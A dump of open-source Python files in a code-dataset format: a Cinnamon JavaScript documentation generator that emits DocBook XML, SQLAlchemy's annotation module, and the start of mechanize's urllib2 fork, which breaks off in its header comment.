            return typ.replace("GLib.", "G")
        else:
            return typ.replace('.', '')
def markup(line, obj):
    """Convert one line of gtk-doc-ish comment markup into docbook XML.

    Handles @param, `code`, **strong**, *emphasis*, #TypeName links and
    %owner.member references.  `obj` supplies the file/object context
    used to resolve names.
    """
    line = re.sub('@(\w*)', '<code>\g<1></code>', line)
    line = re.sub('`([^`]*)`', '<code>\g<1></code>', line)
    line = re.sub('\*\*([^*]*)\*\*', '<emphasis role="strong">\g<1></emphasis>', line)
    line = re.sub('\*([^*]*)\*', '<emphasis>\g<1></emphasis>', line)

    def format_type_link(match):
        # #Foo or #Bar.Foo -> link to the documented type, if known.
        res = match.group(1)
        return '<link linkend="{link}"><code>{name}</code></link>'.format(
            link = get_type_link(res, obj.file),
            name = res)
    line = re.sub('#(([\w]*\.)?[\w]+)', format_type_link, line)

    def format_ext_link(match):
        # %owner.member or %member: link to a property/function/enum on
        # the named owner (or on the current object when unqualified).
        if match.group(1):
            full = match.group(1) + match.group(3)
        else:
            full = match.group(3)
        if match.group(4):
            full += match.group(4)

        owner = match.group(1)
        if owner:
            owner = owner[:-1] # remove trailing .
        else:
            owner = "this"

        thing = match.group(3)

        from gen_doc import objects
        object = None
        if owner == "this":
            object = obj.object
        # NOTE(review): plain `if` (not elif) -- a registry entry named
        # "this" would override the current object; confirm intended.
        if owner in objects:
            object = objects[owner]
        elif obj.file.name + "." + owner in objects:
            object = objects[obj.file.name + "." + owner]

        if object is None:
            # Unknown owner: render as plain code, no link.
            return '<code>{name}</code>'.format(name = full)

        func_names = [x.name for x in object.functions]
        enum_names = [x.name for x in object.enums]
        prop_names = [x.name for x in object.properties]
        if thing in prop_names and not full.endswith("()"):
            # Properties use the double-dash anchor convention.
            return '<link linkend="cinnamon-js-{prefix}--{thing}"><code>{full}</code></link>'.format(
                prefix = object.prefix,
                thing = thing,
                full = full)
        elif thing in func_names or (thing in enum_names and not full.endswith("()")):
            return '<link linkend="cinnamon-js-{prefix}-{thing}"><code>{full}</code></link>'.format(
                prefix = object.prefix,
                thing = thing,
                full = full)
        else:
            return '<code>{name}</code>'.format(name = full)

    line = re.sub('%(([\w]+\.)?[\w]+\.)?([\w]+)(\(\))?', format_ext_link, line)
    return line
class JSThing():
    """Shared behavior for every documented entity (file, object,
    function, signal, enum): description accumulation and conversion of
    the markdown-ish description into docbook XML."""

    def append_description(self, desc):
        # NOTE(review): these two replace() calls are no-ops as written;
        # they look like HTML-escaping ('&lt;'/'&gt;') mangled by the
        # dump this file came from -- confirm against upstream.
        self.description += desc.replace('<', '<').replace('>', '>')

    def get_xml_description(self, description = None):
        """Render `description` (default: self.description) to docbook.

        First pass joins wrapped lines into logical paragraphs, tracking
        ``` code fences and "- " list items; second pass emits <para>,
        <itemizedlist> and <programlisting> elements, running markup()
        on regular text.  Recurses to render each list item.
        """
        if description is None:
            description = self.description

        stuff = description.split('\n')
        joined = ['']
        in_code = False
        in_list = False
        for line in stuff:
            if line.strip() == '```':
                # Toggle code fence; keep the fence markers in the text so
                # the second pass can recognize the block.
                if in_code:
                    joined[-1] += '```'
                    joined.append('')
                else:
                    if in_list:
                        joined[-1] += '\n```'
                    else:
                        joined.append('```\n')
                in_code = not in_code
                continue

            if in_code:
                # Inside a fence: preserve the line verbatim (incl. newlines).
                joined[-1] += '\n' + line
                continue

            line = line.strip()

            if line == '\\' and in_list:
                # Explicit paragraph break inside a list item.
                joined[-1] += '\n\n'
            elif len(line) == 0 or line == '\\':
                # New line if empty
                joined.append('')
                in_list = False
            else:
                if joined[-1] == '' and line.startswith('- '):
                    in_list = True
                if line.startswith('- '):
                    # Each bullet starts its own logical paragraph.
                    joined.append('')
                joined[-1] += ' ' + line

        description = ''
        in_list = False
        list_buffer = []
        for line in joined:
            if line.split('\n')[0].strip() == '```':
                description += '<informalexample><programlisting>{0}</programlisting></informalexample>'\
                    .format(line.replace('```', ''))
                continue

            if line == '':
                continue

            line = line.strip()

            if line.startswith('-'):
                # Buffer list items; flushed as one <itemizedlist> below.
                in_list = True
                list_buffer.append(self.get_xml_description(line[1:]))
                continue

            if in_list:
                # A non-list line ends the pending list: flush it first.
                description += '<itemizedlist>' + \
                    '\n'.join('<listitem>{0}</listitem>'.format(item) for item in list_buffer) + \
                    '</itemizedlist>'
                list_buffer = []
                in_list = False

            line = markup(line, self)
            description += '<para>{0}</para>'.format(line)

        if in_list:
            # Flush a list that ran to the end of the description.
            description += '<itemizedlist>' + \
                '\n'.join('<listitem>{0}</listitem>'.format(item) for item in list_buffer) + \
                '</itemizedlist>'
            list_buffer = []

        return description

    def add_property(self, prop):
        # "short_description" is special-cased: stored on its own slot
        # instead of the ordinary property list.
        if prop.name == "short_description":
            self.short_description = prop
        else:
            self.properties.append(prop)
        prop.file = self.file
        prop.object = self.object
class JSSignal(JSThing):
    """A documented signal emitted by a JS object."""
    def __init__ (self, name):
        self.name = name
        self.description = ''
        # Placeholder; replaced when a short_description property is parsed.
        self.short_description = JSProperty(None, '', '')
        self.properties = []
class JSFunction(JSThing):
    """A documented function or method, including its return value."""
    def __init__ (self, name):
        self.name = name
        self.description = ''
        self.short_description = JSProperty(None, '', '')
        self.properties = []
        # Default "void" return until set_return is called.
        self.return_value = JSProperty(None, '', '')

    def set_return(self, retval):
        self.return_value = retval
        retval.file = self.file
        # NOTE(review): assigns retval.obj while the rest of this module
        # uses .object -- looks like a typo; confirm before relying on it.
        retval.obj = self.object
class JSProperty(JSThing):
    """A named, typed value: a parameter, object property or return value."""
    def __init__ (self, name, arg_type, desc):
        self.name = name
        self.arg_type = arg_type if arg_type else ''
        self.description = ''
        # Route through append_description so escaping stays consistent.
        self.append_description(desc + "\n")
class JSFile(JSThing):
    """Top-level container for everything documented in one source file."""
    def __init__ (self, directory, name):
        self.directory = directory
        # Upper-case only the first letter; the rest keeps its case.
        self.name = name[0].capitalize() + name[1:]
        self.orig_name = self.name
        self.imports = "imports.{0}.{1}".format(directory, name)
        self.prefix = directory + "-" + name
        self.description = ''
        self.short_description = JSProperty(None, '', '')
        self.properties = []
        self.objects = []
        self.signals = []
        self.enums = []
        self.functions = []
        # A file acts as its own "file" and "object" for link resolution.
        self.file = self
        self.object = self

    def is_interesting(self):
        # Only files that actually document something get a page.
        return len(self.functions) + len(self.properties) + len(self.description) > 0

    def add_function(self, func):
        self.functions.append(func)
        func.file = self
        func.object = self

    def add_object(self, obj):
        self.objects.append(obj)
        obj.parent = self
        obj.directory = self.directory
        # Qualify the child's prefix/name with this file's identifiers.
        obj.prefix = self.prefix + "-" + obj.name
        obj.name = self.name + "-" + obj.name
        obj.file = self

    def add_enum(self, obj):
        self.enums.append(obj)
        obj.parent = self
        obj.directory = self.directory
        obj.prefix = self.prefix + "-" + obj.name
        obj.file = self
class JSObject(JSThing):
    """A documented JS class/object; owns functions, signals and enums.

    parent/directory/prefix/name are filled in by JSFile.add_object.
    """
    def __init__ (self, name):
        self.name = name
        self.orig_name = name
        self.inherit = ''
        self.description = ''
        self.short_description = JSProperty(None, '', '')
        self.parent = None
        self.directory = None
        self.prefix = None
        self.functions = []
        self.properties = []
        self.signals = []
        self.enums = []
        self.object = self

    def add_function(self, func):
        self.functions.append(func)
        func.file = self.file
        func.object = self

    def add_signal(self, signal):
        self.signals.append(signal)
        # NOTE(review): sets signal.file to the object itself (not
        # self.file), unlike add_function above -- confirm intended.
        signal.file = self
        signal.object = self

    def set_inherit(self, inherit):
        self.inherit = inherit
class JSEnum(JSThing):
    """A documented enumeration; its members arrive via add_property."""
    def __init__ (self, name):
        self.name = name
        self.description = ''
        self.short_description = JSProperty(None, '', '')
        self.properties = []
        self.object = self
SGML_FORMAT = '''\
<?xml version='1.0'?>
<!DOCTYPE book PUBLIC '-//OASIS//DTD DocBook XML V4.3//EN'
'http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd'
[
<!ENTITY % local.common.attrib "xmlns:xi CDATA #FIXED 'http://www.w3.org/2003/XInclude'">
]>
<book id='index'>
<bookinfo>
<title>Cinnamon Javascript Reference Manual</title>
<releaseinfo>
This document is for Cinnamon {version}.
The latest version of this documentation can be found online at <ulink role="online-location" url="http://developer.linuxmint.com/reference/git/cinnamon-js/">http://developer.linuxmint.com/reference/git/cinnamon-js/</ulink>.
</releaseinfo>
</bookinfo>
{chapters}
</book>'''
SGML_CHAPTER_FORMAT = '''
<chapter id="cinnamon-js-{prefix}-section">
<title>{title}</title>
{entries}
</chapter>'''
SGML_ENTRY_FORMAT = '<xi:include href="{directory}/{name}.xml"/>'
FILE_FORMAT = '''\
<?xml version='1.0'?>
<!DOCTYPE refentry PUBLIC '-//OASIS//DTD DocBook XML V4.3//EN'
'http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd'
[
<!ENTITY % local.common.attrib "xmlns:xi CDATA #FIXED 'http://www.w3.org/2003/XInclude'">
]>
<refentry id="cinnamon-js-{prefix}">
<refmeta>
<refentrytitle role="top_of_page" id="cinnamon-js-{prefix}.top_of_page">{name}</refentrytitle>
<manvolnum>3</manvolnum>
<refmiscinfo>
{name}
</refmiscinfo>
</refmeta>
<refnamediv>
<refname>{name}</refname>
<refpurpose>{short_description}</refpurpose>
</refnamediv>
{func_header}
{prop_header}
{signal_header}
{enum_header}
{hierarchy}
{description}
{functions}
{properties}
{signals}
{enums}
</refentry>
'''
FUNCTION_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.functions" role="functions_proto">
<title role="functions_proto.title">Functions</title>
<informaltable pgwide="1" frame="none">
<tgroup cols="2">
<colspec colname="functions_return" colwidth="150px"/>
<colspec colname="functions_name"/>
<tbody>
{function_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
FUNCTION_HEADER_ITEM_FORMAT = '''
<row>
<entry role="function_type">
<link linkend="{return_link}">
<returnvalue>{return_name}</returnvalue>
</link>
</entry>
<entry role="function_name">
<link linkend="cinnamon-js-{prefix}-{name}">{name}</link> <phrase role="c_punctuation">()</phrase>
</entry>
</row>
'''
PROPERTY_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.properties" role="properties">
<title role="properties.title">Properties</title>
<informaltable frame="none">
<tgroup cols="3">
<colspec colname="properties_type" colwidth="150px"/>
<colspec colname="properties_name" colwidth="300px"/>
<tbody>
{property_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
SIGNAL_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.signals" role="signal_proto">
<title role="signal_proto.title">Signals</title>
<informaltable frame="none">
<tgroup cols="3">
<colspec colname="signals_return" colwidth="150px" />
<colspec colname="signals_name" colwidth="300px" />
<tbody>
{signal_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
SIGNAL_HEADER_ITEM_FORMAT = '''
<row>
<entry role="signal_type">
</entry>
<entry role="signal_name">
<link linkend="cinnamon-js-{prefix}-{name}-signal">{name}</link>
</entry>
</row>
'''
ENUM_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.other" role="other_proto">
<title role="other_proto.title">Types and Values</title>
<informaltable role="enum_members_table" pgwide="1" frame="none">
<tgroup cols="2">
<colspec colname="name" colwidth="150px"/>
<colspec colname="description"/>
<tbody>
{enum_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
ENUM_HEADER_ITEM_FORMAT = '''
<row>
<entry role="datatype_keyword">enum</entry>
<entry role="function_name">
<link linkend="cinnamon-js-{prefix}-{name}">{name}</link>
</entry>
</row>
'''
PROPERTY_HEADER_ITEM_FORMAT = '''
<row>
<entry role="property_type">
<link linkend="{type_link}"><type>{type_name}</type></link>
</entry>
<entry role="property_name">
<link linkend="cinnamon-js-{prefix}--{name}">{name}</link>
</entry>
</row>
'''
HIERARCHY_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.object-hierarchy" role="object_hierarchy">
<title role="object_hierarchy.title">Object Hierarchy</title>
<screen>
<link linkend="Object">Object</link>
{hierarchy}
</screen>
</refsect1>
'''
HIERARCHY_ITEM_FORMAT = '{spacing}<phrase role="lineart">╰──</phrase> <link linkend="cinnamon-js-{prefix}">{name}</link>'
DESCRIPTION_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.description" role="desc">
<title role="desc.title">Description</title>
{description}
</refsect1>
'''
FUNCTIONS_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.functions_details" role="details">
<title role="details.title">Functions</title>
{functions}
</refsect1>
'''
FUNCTION_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}-{name}" role="function">
<title>{name} ()</title>
<indexterm zone="cinnamon-js-{prefix}-{name}"><primary>{name}</primary></indexterm>
<programlisting language="javascript">
<link linkend="{return_link}"><returnvalue>{return_type}</returnvalue></link>
{name} ({inline_params});</programlisting>
{description}
{params}
{return_desc}
</refsect2>
'''
SIGNALS_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.signal-details" role="details">
<title role="details.title">Signal details</title>
{signals}
</refsect1>
'''
SIGNAL_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}-{name}-signal" role="signal">
<title>The <literal>“{name}”</literal> signal</title>
<indexterm zone="cinnamon-js-{prefix}-{name}-signal"><primary>{prefix}::{name}</primary></indexterm>
<programlisting language="javascript">
user_function ({inline_params});</programlisting>
{description}
{params}
</refsect2>
'''
FUNC_PARAMETERS_FORMAT = '''
<refsect3 role="parameters">
<title>Parameters</title>
<informaltable role="parameters_table" pgwide="1" frame="none">
<tgroup cols="3">
<colspec colname="parameters_name" colwidth="150px"/>
<colspec colname="parameters_description"/>
<colspec colname="parameters_annotations" colwidth="200px"/>
<tbody>
{param_items}
</tbody>
</tgroup>
</informaltable>
</refsect3>
'''
INLINE_PARAMETER_FORMAT = '<parameter><link linkend="{type_link}"><type>{type_name}</type></link>{name}</parameter>'
FUNC_PARAMETERS_ITEM_FORMAT = '''
<row>
<entry role="parameter_name"><para>{name}</para></entry>
<entry role="parameter_description">{description}</entry>
<entry role="parameter_annotations"></entry>
</row>
'''
FUNC_RETURN_FORMAT = '''
<refsect3 role="returns">
<title>Returns</title>
{desc}
</refsect3>
'''
PROPERTIES_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.property-details" role="property_details">
<title role="property_details.title">Property Details</title>
{properties}
</refsect1>
'''
PROPERTIES_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}--{name}" role="property">
<title>The <literal>“{name}”</literal> property</title>
<indexterm zone="cinnamon-js-{prefix}--{name}">
<primary>cinnamon-js-{prefix}:{name}</primary>
</indexterm>
<programlisting> {disp_name} <link linkend="{type_link}"><type>{type_name}</type></link></programlisting>
{description}
</refsect2>
'''
ENUMS_FORMAT = '''
<refsect1 id="CinnamonGlobal.other_details" role="details">
<title role="details.title">Types and Values</title>
{enums}
</refsect1>
'''
ENUMS_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}" role="enum">
<title>enum {name}</title>
<indexterm zone="{name}"><primary>{name}</primary></indexterm>
{description}
<refsect3 role="enum_members">
<title>Members</title>
<informaltable role="enum_members_table" pgwide="1" frame="none">
<tgroup cols="2">
<colspec colname="enum_members_name" colwidth="300px"/>
<colspec colname="enum_members_description"/>
<tbody>
{enum_items}
</tbody>
</tgroup>
</informaltable>
</refsect3>
</refsect2>
'''
ENUMS_ITEM_ROW_FORMAT = '''
<row role="constant">
<entry role="enum_member_name"><para id="{name}:CAPS">{name}</para></entry>
<entry role="enum_member_description">{description}</entry>
</row>
'''
def write_sgml(files, version):
    """Write the top-level DocBook index file (cinnamon-js-docs.sgml).

    files:   iterable of JSFile instances to list as chapters.
    version: Cinnamon version string shown in the book's release info.
    """
    chapters = []
    for _file in files:
        # Skip files that contribute neither documentation nor objects.
        if not _file.is_interesting() and len(_file.objects) == 0:
            continue
        if _file.is_interesting():
            # List the file itself as the first entry of its chapter.
            # NOTE: this mutates _file.objects in place.
            _file.objects.insert(0, _file)
        entries = [SGML_ENTRY_FORMAT.format(
            directory=_file.directory,
            name=obj.name) for obj in _file.objects]
        chapters.append(SGML_CHAPTER_FORMAT.format(
            prefix=_file.prefix,
            title=_file.imports,
            entries="\n".join(entries)))
    # Use a context manager so the handle is always closed; the original
    # opened the file up front and never closed it (resource leak).
    with open('cinnamon-js-docs.sgml', 'w') as sgml:
        sgml.write(SGML_FORMAT.format(
            version=version,
            chapters="\n".join(chapters)))
def create_file(obj):
    """Write the DocBook refentry XML for *obj* (a JSFile or JSObject) to
    <directory>/<name>.xml."""
    short_description = obj.short_description.description.replace("\n", " ").strip()
    # 'with' guarantees the handle is closed even if a formatter below
    # raises; the original only closed it on the success path.
    with open('{0}/{1}.xml'.format(obj.directory, obj.name), 'w') as file_obj:
        file_obj.write(FILE_FORMAT.format(
            prefix=obj.prefix,
            name=obj.name.replace("-", "."),
            short_description=markup(short_description, obj),
            func_header=get_function_header(obj),
            signal_header=get_signal_header(obj),
            prop_header=get_properties_header(obj),
            enum_header=get_enum_header(obj),
            hierarchy=get_hierarchy(obj),
            description=get_description(obj),
            functions=get_functions(obj),
            signals=get_signals(obj),
            properties=get_properties(obj),
            enums=get_enums(obj)))
def get_function_header(obj):
    """Render the "Functions" summary table for *obj*; '' when it has no
    functions."""
    if not obj.functions:
        return ""
    rows = []
    for func in obj.functions:
        rows.append(FUNCTION_HEADER_ITEM_FORMAT.format(
            return_link=get_type_link(func.return_value.arg_type, obj.file),
            return_name=func.return_value.arg_type,
            prefix=obj.prefix,
            name=func.name))
    return FUNCTION_HEADER_FORMAT.format(
        prefix=obj.prefix,
        function_headers="\n".join(rows))
def get_signal_header(obj):
    """Render the "Signals" summary table for *obj*; '' when it has no
    signals."""
    if not obj.signals:
        return ""
    rows = []
    for sig in obj.signals:
        rows.append(SIGNAL_HEADER_ITEM_FORMAT.format(
            prefix=obj.prefix,
            name=sig.name))
    return SIGNAL_HEADER_FORMAT.format(
        prefix=obj.prefix,
        signal_headers="\n".join(rows))
def get_properties_header(obj):
    """Render the "Properties" summary table for *obj*; '' when it has no
    properties."""
    if not obj.properties:
        return ""
    rows = []
    for prop in obj.properties:
        rows.append(PROPERTY_HEADER_ITEM_FORMAT.format(
            type_link=get_type_link(prop.arg_type, obj.file),
            type_name=prop.arg_type,
            prefix=obj.prefix,
            name=prop.name))
    return PROPERTY_HEADER_FORMAT.format(
        prefix=obj.prefix,
        property_headers="\n".join(rows))
def get_enum_header(obj):
    """Render the "Types and Values" summary table for *obj*; '' when it
    has no enums."""
    if not obj.enums:
        return ""
    rows = []
    for enum in obj.enums:
        rows.append(ENUM_HEADER_ITEM_FORMAT.format(
            prefix=obj.prefix,
            name=enum.name))
    return ENUM_HEADER_FORMAT.format(
        prefix=obj.prefix,
        enum_headers="\n".join(rows))
def get_hierarchy(obj):
    # Render the "Object Hierarchy" section by walking the inheritance
    # chain recorded in the global gen_doc.objects registry.
    # Imported here to avoid a circular import at module load time.
    from gen_doc import objects
    if isinstance(obj, JSFile):
        # Files have no inheritance chain.
        return ""
    name = obj.name.replace('-', '.')
    hierarchy = []
    try:
        while True:
            name = objects[name].inherit
            if name in hierarchy:
                # Inheritance cycle detected -- stop walking.
                break
            if name:
                # Prepend so the root ancestor ends up first.
                hierarchy.insert(0, name)
    except KeyError:
        # Reached a type not in the registry (e.g. an external class);
        # that terminates the walk.
        pass
    count = 1
    hierarchy_strs = []
    for item in hierarchy:
        try:
            hierarchy_strs.append(HIERARCHY_ITEM_FORMAT.format(
                spacing = ' ' * count * 4,
                prefix = objects[item].prefix,
                name = item))
        except KeyError:
            # Unknown ancestor: emit it with a dead "void" link target.
            hierarchy_strs.append(HIERARCHY_ITEM_FORMAT.format(
                spacing = ' ' * count * 4,
                prefix = "void",
                name = item))
        count += 1
    # Finally the object itself, one level deeper than its last ancestor.
    hierarchy_strs.append(HIERARCHY_ITEM_FORMAT.format(
        spacing = ' ' * count * 4,
        prefix = "void",
        name = obj.name.replace('-', '.')))
    return HIERARCHY_FORMAT.format(
        prefix = obj.prefix,
        hierarchy = "\n".join(hierarchy_strs))
def get_description(obj):
    """Render the long "Description" section of *obj*; '' when it has no
    description text."""
    if not obj.description:
        return ""
    return DESCRIPTION_FORMAT.format(
        prefix=obj.prefix,
        description=obj.get_xml_description())
def get_functions(obj):
    # Render the "Functions" detail section; '' when *obj* has none.
    if len(obj.functions) == 0:
        return ""
    functions = []
    for func in obj.functions:
        inline_params = ""
        params = ""
        if len(func.properties) > 0:
            # Calculate how long the argument types are and make the arguments
            # align
            max_length = max(len(x.arg_type) for x in func.properties) + 3
            # If no parameter has argument types, don't show that silly
            # whitespace
            if max_length == 3:
                max_length = 0
            inline_params = [INLINE_PARAMETER_FORMAT.format(
                type_link = get_type_link(param.arg_type, obj.file),
                type_name = param.arg_type,
                name = " " * (max_length - len(param.arg_type)) + param.name) for param in func.properties]
            # Indent continuation lines so parameters line up under the
            # opening parenthesis of "<name> (".
            inline_params = (',\n' + ' ' * (len(func.name) + 2)).join(inline_params)
            params = [FUNC_PARAMETERS_ITEM_FORMAT.format(
                name = param.name,
                description = param.get_xml_description()) for param in func.properties]
            params = FUNC_PARAMETERS_FORMAT.format(param_items = '\n'.join(params))
        return_desc = ""
        if func.return_value.name is not None:
            # A named return value means the function documented "Returns:".
            return_desc = FUNC_RETURN_FORMAT.format(desc=func.return_value.get_xml_description())
        functions.append(FUNCTION_ITEM_FORMAT.format(
            prefix = obj.prefix,
            name = func.name,
            return_link = get_type_link(func.return_value.arg_type, obj.file),
            return_type = func.return_value.arg_type,
            description = func.get_xml_description(),
            inline_params = inline_params,
            params = params,
            return_desc = return_desc))
    return FUNCTIONS_FORMAT.format(
        prefix = obj.prefix,
        functions = "\n".join(functions))
def get_signals(obj):
    # Render the "Signal details" section; '' when *obj* has no signals.
    if len(obj.signals) == 0:
        return ""
    signals = []
    for sig in obj.signals:
        inline_params = ""
        params = ""
        if len(sig.properties) > 0:
            # Calculate how long the argument types are and make the arguments
            # align
            max_length = max(len(x.arg_type) for x in sig.properties) + 3
            # If no parameter has argument types, don't show that silly
            # whitespace
            if max_length == 3:
                max_length = 0
            inline_params = [INLINE_PARAMETER_FORMAT.format(
                type_link = get_type_link(param.arg_type, obj.file),
                type_name = param.arg_type,
                name = " " * (max_length - len(param.arg_type)) + param.name) for param in sig.properties]
            # Indent continuation lines so parameters line up under the
            # opening parenthesis of "user_function (".
            inline_params = (',\n' + ' ' * (len(sig.name) + 2)).join(inline_params)
            params = [FUNC_PARAMETERS_ITEM_FORMAT.format(
                name = param.name,
                description = param.get_xml_description()) for param in sig.properties]
            params = FUNC_PARAMETERS_FORMAT.format(param_items = '\n'.join(params))
        signals.append(SIGNAL_ITEM_FORMAT.format(
            prefix = obj.prefix,
            name = sig.name,
            description = sig.get_xml_description(),
            inline_params = inline_params,
            params = params))
    return SIGNALS_FORMAT.format(
        prefix = obj.prefix,
        signals = "\n".join(signals))
def get_properties(obj):
    """Render the "Property Details" section for *obj*; '' when it has no
    properties."""
    if not obj.properties:
        return ""
    rendered = []
    for prop in obj.properties:
        rendered.append(PROPERTIES_ITEM_FORMAT.format(
            prefix=obj.prefix,
            name=prop.name,
            disp_name=('“' + prop.name + '”').ljust(25),
            type_link=get_type_link(prop.arg_type, obj.file),
            type_name=prop.arg_type,
            description=prop.get_xml_description()))
    return PROPERTIES_FORMAT.format(
        prefix=obj.prefix,
        properties="\n".join(rendered))
def get_enums(obj):
    """Render the "Types and Values" detail section for *obj*; '' when it
    has no enums."""
    if not obj.enums:
        return ""
    sections = []
    for enum in obj.enums:
        member_rows = "\n".join(
            ENUMS_ITEM_ROW_FORMAT.format(
                name=member.name,
                description=member.get_xml_description())
            for member in enum.properties)
        sections.append(ENUMS_ITEM_FORMAT.format(
            prefix=enum.prefix,
            name=enum.name,
            description=enum.get_xml_description(),
            enum_items=member_rows))
    return ENUMS_FORMAT.format(
        prefix=obj.prefix,
        enums="\n".join(sections))
| gpl-2.0 |
Maximilian-Reuter/SickRage | lib/sqlalchemy/sql/annotation.py | 79 | 6143 | # sql/annotation.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The :class:`.Annotated` class and related routines; creates hash-equivalent
copies of SQL constructs which contain context-specific markers and associations.
"""
from .. import util
from . import operators
class Annotated(object):
    """clones a ClauseElement and applies an 'annotations' dictionary.

    Unlike regular clones, this clone also mimics __hash__() and
    __cmp__() of the original element so that it takes its place
    in hashed collections.

    A reference to the original element is maintained, for the important
    reason of keeping its hash value current.  When GC'ed, the
    hash value may be reused, causing conflicts.

    """

    def __new__(cls, *args):
        if not args:
            # clone constructor
            return object.__new__(cls)
        else:
            element, values = args
            # pull appropriate subclass from registry of annotated
            # classes
            try:
                cls = annotated_classes[element.__class__]
            except KeyError:
                # first annotation of this element type: generate and
                # register a dedicated Annotated subclass for it.
                cls = _new_annotation_type(element.__class__, cls)
            return object.__new__(cls)

    def __init__(self, element, values):
        # Copy the element's state wholesale so attribute access works
        # transparently on the annotated wrapper.
        self.__dict__ = element.__dict__.copy()
        self.__element = element
        self._annotations = values

    def _annotate(self, values):
        # Merge *values* on top of the existing annotations.
        _values = self._annotations.copy()
        _values.update(values)
        return self._with_annotations(_values)

    def _with_annotations(self, values):
        # Shallow copy of self carrying exactly *values* as annotations.
        clone = self.__class__.__new__(self.__class__)
        clone.__dict__ = self.__dict__.copy()
        clone._annotations = values
        return clone

    def _deannotate(self, values=None, clone=True):
        if values is None:
            # Removing everything: simply hand back the wrapped element.
            return self.__element
        else:
            # Remove only the named annotation keys.
            _values = self._annotations.copy()
            for v in values:
                _values.pop(v, None)
            return self._with_annotations(_values)

    def _compiler_dispatch(self, visitor, **kw):
        # Dispatch via the wrapped element's class so the SQL compiler
        # treats this object exactly like the original construct.
        return self.__element.__class__._compiler_dispatch(self, visitor, **kw)

    @property
    def _constructor(self):
        return self.__element._constructor

    def _clone(self):
        clone = self.__element._clone()
        if clone is self.__element:
            # detect immutable, don't change anything
            return self
        else:
            # update the clone with any changes that have occurred
            # to this object's __dict__.
            clone.__dict__.update(self.__dict__)
            return self.__class__(clone, self._annotations)

    def __hash__(self):
        # Hash like the wrapped element so we occupy its slot in hashed
        # collections.
        return hash(self.__element)

    def __eq__(self, other):
        if isinstance(self.__element, operators.ColumnOperators):
            # Column-like elements overload == to produce SQL expressions;
            # defer to the element class's __eq__.
            return self.__element.__class__.__eq__(self, other)
        else:
            return hash(other) == hash(self)
# hard-generate Annotated subclasses. this technique
# is used instead of on-the-fly types (i.e. type.__new__())
# so that the resulting objects are pickleable.
annotated_classes = {}
def _deep_annotate(element, annotations, exclude=None):
    """Deep copy the given ClauseElement, annotating each element
    with the given annotations dictionary.

    Elements within the exclude collection will be cloned but not annotated.

    """
    def clone(elem):
        if exclude and \
                hasattr(elem, 'proxy_set') and \
                elem.proxy_set.intersection(exclude):
            # Excluded element: copy it but leave annotations untouched.
            newelem = elem._clone()
        elif annotations != elem._annotations:
            newelem = elem._annotate(annotations)
        else:
            # Already carries exactly these annotations; reuse as-is.
            newelem = elem
        # Recurse into child clause elements with the same policy.
        newelem._copy_internals(clone=clone)
        return newelem

    if element is not None:
        element = clone(element)
    return element
def _deep_deannotate(element, values=None):
    """Deep copy the given element, removing annotations."""
    # Memoization table so shared sub-elements map to a single copy.
    cloned = util.column_dict()

    def clone(elem):
        # if a values dict is given,
        # the elem must be cloned each time it appears,
        # as there may be different annotations in source
        # elements that are remaining. if totally
        # removing all annotations, can assume the same
        # slate...
        if values or elem not in cloned:
            newelem = elem._deannotate(values=values, clone=True)
            newelem._copy_internals(clone=clone)
            if not values:
                # Memoize only in the remove-everything case (see above).
                cloned[elem] = newelem
            return newelem
        else:
            return cloned[elem]

    if element is not None:
        element = clone(element)
    return element
def _shallow_annotate(element, annotations):
    """Annotate the given ClauseElement and copy its internals so that
    internal objects refer to the new annotated object.

    Basically used to apply a "dont traverse" annotation to a
    selectable, without digging throughout the whole
    structure wasting time.
    """
    element = element._annotate(annotations)
    # Re-point internal references at the annotated copy without
    # traversing children.
    element._copy_internals()
    return element
def _new_annotation_type(cls, base_cls):
    # Return the Annotated subclass for *cls*, generating and registering
    # it on first use.
    if issubclass(cls, Annotated):
        return cls
    elif cls in annotated_classes:
        return annotated_classes[cls]

    for super_ in cls.__mro__:
        # check if an Annotated subclass more specific than
        # the given base_cls is already registered, such
        # as AnnotatedColumnElement.
        if super_ in annotated_classes:
            base_cls = annotated_classes[super_]
            break

    annotated_classes[cls] = anno_cls = type(
        "Annotated%s" % cls.__name__,
        (base_cls, cls), {})
    # Expose the generated class at module level so instances are
    # pickleable (pickle looks classes up by qualified name).
    globals()["Annotated%s" % cls.__name__] = anno_cls
    return anno_cls
def _prepare_annotations(target_hierarchy, base_cls):
    """Eagerly generate Annotated subclasses for *target_hierarchy* and
    every class beneath it in the subclass tree."""
    pending = [target_hierarchy]
    while pending:
        current = pending.pop()
        pending.extend(current.__subclasses__())
        _new_annotation_type(current, base_cls)
| gpl-3.0 |
campbe13/openhatch | vendor/packages/mechanize/mechanize/_urllib2_fork.py | 130 | 49067 | """Fork of urllib2.
When reading this, don't assume that all code in here is reachable. Code in
the rest of mechanize may be used instead.
Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 Python
Software Foundation; All Rights Reserved
Copyright 2002-2009 John J Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
# XXX issues:
# If an authentication error handler that tries to perform
# authentication for some reason but fails, how should the error be
# signalled? The client needs to know the HTTP error code. But if
